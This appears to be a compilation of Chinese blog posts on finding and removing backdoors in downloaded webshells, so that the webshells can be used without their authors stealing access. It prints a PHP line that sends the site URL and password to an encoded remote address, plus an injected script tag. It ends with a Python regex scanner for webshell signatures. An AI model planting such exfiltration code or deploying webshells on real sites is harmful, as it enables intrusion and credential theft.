webshell后门分析
什么是WebShell
顾名思义，“web”的含义是需要服务器开放web服务；“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户（入侵者）通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。
很多时候我们下载很多别人的webshell，我们要去判断这个webshell有没有后门，有的开发者通过后门让使用者中病毒，同时令目标网站有后门，从而获取我们的资源
（其实很多广告就是一种后门）
php,asp,jsp等都可以用记事本打开

首先先把密码改了
大马后门分析
1、解密脚本代码
通过查找代码非法登录几个关键字，发现这段代码是经过加密的，于是把函数execute改为msgbox这个函数， 进行解密明文输出
之后将文件格式改为VBS脚本执行
2、分析后门代码
 if request("%")="%" then
 Session("web2a2dmin") = UserPass
       URL()
  end if
	

3、编写后门利用工具
中国菜刀一句话后门分析
菜刀与大马不同 ，才用的CS框架，看不见源代码

因此通过协议来看有没有后门
打开WSockExpert软件，也可以选择其它抓包软件，选择需要监听的“中国菜刀”程序进程，双击

这个抓包软件可以针对windows下的进程进行抓包

在包中可以看见文件名

有一个包有一段代码开头为  密码=

采用base64解密代码

（有可能有的时候两层）

解码之后发现这段代码是把使用者主机名（菜刀链接地址）+URL+密码 发送给了开发者
其它脚本后门分析
我们可以通过通信解决有没有后门

最后在登录状态下

密码框 查看元素 网络

之后点击登录

仔细观察文件那里

点开之后可以看到也是把我们访问的文件发送给开发者了

简单去 webshell 后门方法
0x00 前言

因为我的电脑重装系统之后里面的文件都没有了，所以我近期经常会在网上收集工具，木马，并进行测试，但是令我惊讶的是，基本上在网上找到的马都有后门存在，想必各位都不想自己的劳动成果被别人拿走吧。所以我这篇文章就会教大家简单的去后门。
0X01 环境及工具

本次使用到的环境以及工具有：
某 QQ 群随便下的木马
宝塔面板自带文件编辑
nginx/1.14.0  QQ 浏览器
这是本次所使用的大马的登录界面



这是大马的功能页 一个不错的大马（可惜，有后门。）


大马的       源   代      码


0x02 过程

从源代码中可以知道，这个木马是经过 gzp 及 base64 加密的程序，这种加密的程序我们只需要把 eval 改为 echo 即可解密。

但是我们先不急解密大马的内容，我们先查看一下木马的代码末尾是否有“小学生”后期添加的后门，可以看见 这个木马的末尾有一句  :<script src=http://t.cn/R6YD1Qv></script>

非常明显的 xss 语句，我们先删除该语句。再对木马进行解密。

解密之后直接访问木马程序的话里面的 html 还是会生效的，使用我们要 使用浏览器的查看源代码功能。

使用查看源代码前：

使用查看源代码后：



这个时候我们就可以查看解密之后的木马源代码了。
那么如何查看木马是否有后门并去掉呢？

一般情况下，后门的地址是会加密的，但是我们可以通过搜索aHR，base64，password来找后门, 那么这个程序我是通过搜索 base64 发现的后门：
if(isset($_GET['login'])=='geturl'){@set_time_limit(10);$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];$serverp = envlpass;$copyurl = base64_decode('aHR0cDovLyU3MSU3OSU3NiU2MyUyZSU2MyU2ZiU2ZC8lNzAlNjglNzAvP3U9');$url=$copyurl.$serveru.'&p='.$serverp;$url=urldecode($url);GetHtml($url);



在发现后门之后我们把 base64 编码后的内容解密一下：



访问解密的内容后发现，这个地址已经报 404 了，但是为了安全起见，我们还是把 base64 的编码去掉。



0x03 完

在感叹世道如此的时候也不得不问一下，究竟是人性的扭曲还是道德的沦陷，致使现在连用个木马都不安心，还得去后门才能安心使用？
仅提供 想法和思路请勿乱来感谢各位！！！

后门这东西好让人蛋疼，第一文件太多了，不容易找，第二，难找，需要特征匹配啊。搞了一个python版查杀php webshell后门工具，大家可以增加后门的特征码，然后甩到后台给他查杀就可以了。
这个代码比较简单，大家可以继续完善下。
#!/usr/bin/python
# -*- coding: utf-8 -*-
#blog:www.jincon.com
import os
import sys
import re
rulelist = [
'(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))',
'(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))',
'eval\(base64_decode\(',
'(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
'(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
'(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))',
'(wscript\.shell)',
'(gethostbyname\()',
'(cmd\.exe)',
'(shell\.application)',
'(documents\s+and\s+settings)',
'(system32)',
'(serv-u)',
'(提权)',
'(phpspy)',
'(后门)',
'(webshell)',
'(Program\s+Files)'
]
def Scan(path):
for root,dirs,files in os.walk(path):
for filespath in files:
isover = False
if '.' in filespath:
ext = filespath[(filespath.rindex('.')+1):]
if ext=='php':
file= open(os.path.join(root,filespath))
filestr = file.read()
file.close()
for rule in rulelist:
result = re.compile(rule).findall(filestr)
if result:
print '文件：'+os.path.join(root,filespath)
print '恶意代码：'+str(result[0])
print '\n\n'
break
if os.path.lexists(sys.argv[1]):
print('\n\n开始扫描：'+sys.argv[1])
print('               可疑文件                 ')
print('########################################')
Scan(sys.argv[1])
print('提示：扫描完成-- O(∩_∩)O哈哈~')
else:
print '提示：指定的扫描目录不存在---  我靠( \'o′)！！凸'

别再让我遇到，不会有结果又很喜欢的人。。。

​----  网易云热评

一、访问上传的木马文件

http://192.168.1.104/1.asp



 

二、点击F12，打开谷歌自带的开发人员工具，点击network



 

三、输入密码，看看抓包情况，该木马会自动向某网站上传木马路径和密码



 

四、查看木马源文件，然后搜索该网址，随便修改为一个无效地址，该木马用的是反转加密，所以我们搜索不到，有时候是其他加密，需要解密才可以修改

 

注意：抓包的时候，有的后门不是一登录就发送的，也有可能停一段时间才发送，甚至当你退出的时候才发送

 

禁止非法，后果自负

欢迎关注公众号：web安全工具库

欢迎关注视频号：之乎者也吧